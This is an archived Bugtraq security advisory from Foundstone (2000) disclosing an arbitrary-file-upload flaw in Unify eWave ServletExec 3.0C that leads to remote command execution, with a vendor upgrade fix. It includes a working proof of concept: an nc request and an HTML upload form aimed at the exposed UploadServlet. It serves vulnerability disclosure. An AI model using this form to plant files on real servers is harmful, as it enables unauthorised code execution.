Home page logo
/

bugtraq logo Bugtraq mailing list archives

Unify eWave ServletExec upload
From: Foundstone Labs <labs () FOUNDSTONE COM>
Date: Tue, 31 Oct 2000 20:38:58 -0800

                            Foundstone, Inc.
                        http://www.foundstone.com
                      "Securing the Dot Com World"

                           Security Advisory

                      Unify eWave ServletExec upload

----------------------------------------------------------------------
FS Advisory ID:         FS-103100-16-SRVX

Release Date:           October 31, 2000

Product:                Unify eWave ServletExec 3.0C

Vendor:                 Unify Corp.
                        (http://www.unifyewave.com/servletexec/)

Type:                   Uploading arbitrary files leading to remote
                        command execution.

Severity:               High

Author:                 Shreeraj Shah (shreeraj.shah () foundstone com)
                        Saumil Shah (saumil.shah () foundstone com)
                        Stuart McClure (stuart.mcclure () foundstone com)
                        Foundstone, Inc. (http://www.foundstone.com)

Operating Systems:      All operating systems supported by ServletExec

Vulnerable versions:    Unify eWave ServletExec 3.0C

Foundstone Advisory:    http://www.foundstone.com/advisories.htm
----------------------------------------------------------------------

Description

        Unify's eWave ServletExec is a JSP and a Java Servlet engine
        which is used as a plug-in to popular web servers like
        Apache, IIS, Netscape, etc.

        ServletExec has a servlet called "UploadServlet" in its server
        side classes. UploadServlet, when invokable, allows an
        attacker to upload any file to any directory on the server. The
        uploaded file may have code that can later be executed on the
        server, leading to remote command execution.

Details

        ServletExec has com.unify.ewave.servletexec.UploadServlet residing
        in its server side classes. Even though this servlet is not
        registered, it can be invoked on the server side by the following
        HTTP requests:

        nc 10.0.0.1 80
        GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0

        -or-

        http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet

        An attacker can create an HTML form on his or her local system
        to use this servlet to upload arbitrary files on to the server.
        A sample of such a form is given below:

        <FORM METHOD=POST ENCTYPE='multipart/form-data'

ACTION='http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet&apos;>
        <P>
        Upload Directory:
        <INPUT TYPE=TEXT SIZE=35 Name=uploadDir>
        <P>
        File to Upload:
        <INPUT TYPE=FILE SIZE=35 NAME=File1>
        <P>
        <INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files">
        </FORM>

        Using this upload form, an attacker can upload a file, for
        example a JSP file, that can run arbitrary commands on the
        server side.

Solution

        Upgrade to ServletExec version 3.0E, available at:

        http://www.servletexec.com/downloads/

        Please contact the vendor for further details at
        info () unify com or Unify Sales at 1-800-248-6439

Credits

        We would like to thank Unify for their prompt reaction to this
        problem and their co-operation in heightening awareness in the
        security community.

Disclaimer

        The information contained in this advisory is the copyright (C)
        2000 of Foundstone, Inc. and believed to be accurate at the time
        of printing, but no representation or warranty is given, express
        or implied, as to its accuracy or completeness. Neither the
        author nor the publisher accepts any liability whatsoever for
        any direct, indirect or conquential loss or damage arising in
        any way from any use of, or reliance placed on, this information
        for any purpose. This advisory may be redistributed provided that
        no fee is assigned and that the advisory is not modified in any
        way.


  By Date           By Thread  

Current thread:
  • Unify eWave ServletExec upload Foundstone Labs (Nov 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]